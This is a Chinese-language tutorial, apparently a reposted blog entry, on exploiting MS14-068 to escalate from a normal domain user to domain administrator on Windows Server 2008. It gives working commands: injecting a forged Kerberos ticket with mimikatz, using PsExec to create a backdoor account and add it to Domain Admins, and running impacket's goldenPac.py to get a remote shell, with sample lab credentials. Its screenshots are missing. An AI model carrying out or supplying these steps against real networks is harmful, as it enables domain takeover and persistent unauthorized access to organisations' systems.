内网|MS14-068漏洞进行提权

参考:https://blog.csdn.net/qq_37683287/article/details/120450044
域普通用户提权到域控权限

server2008有效 MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。
第一步:利用MS14-068伪造生成TGT
内网|MS14-068漏洞进行提权
文章图片

第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书
kerberos::ptc TGT_test@moonsec.fbi.ccache

内网|MS14-068漏洞进行提权
文章图片

【内网|MS14-068漏洞进行提权】第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操
作。
PsExec.exe \\dc cmd.exe // 添加test用户 net user test abc123! /add /domain // 把 test 用户添加进域管理员组 net group "domain admins" test /add /domain // 查看域管理员net group "domain admins" /domain

或者使用
python3 goldenPac.py -dc-ip 192.168.0.142 -target-ip 192.168.0.142 moonsec.fbi/test:123456@08server-dc.moonsec.fbi

内网|MS14-068漏洞进行提权
文章图片

GoldenPac
goldenPac.py 是一个用于对 Kerberos 协议进行测试的工具,它集成在 impacket 工具包里。
Kali 在使用之前需要先安装 Kerberos 客户端
apt-get install krb5-user -y
利用 goldenPac.py 获取 Shell
python3 goldenPac.py 0day.org/jack:Aa123456@OWA2010SP3.0day.org
这里使用 IP 进行连接会连接不成功,只能使用主机名,因此可以在 hosts 文件中添加主机名对应的 IP
goldenPac.py 是通过 PsExec 获得 Shell 的,因此会产生大量的日志,而且现在这种连接方式也已经被各大杀软所拦截。

    推荐阅读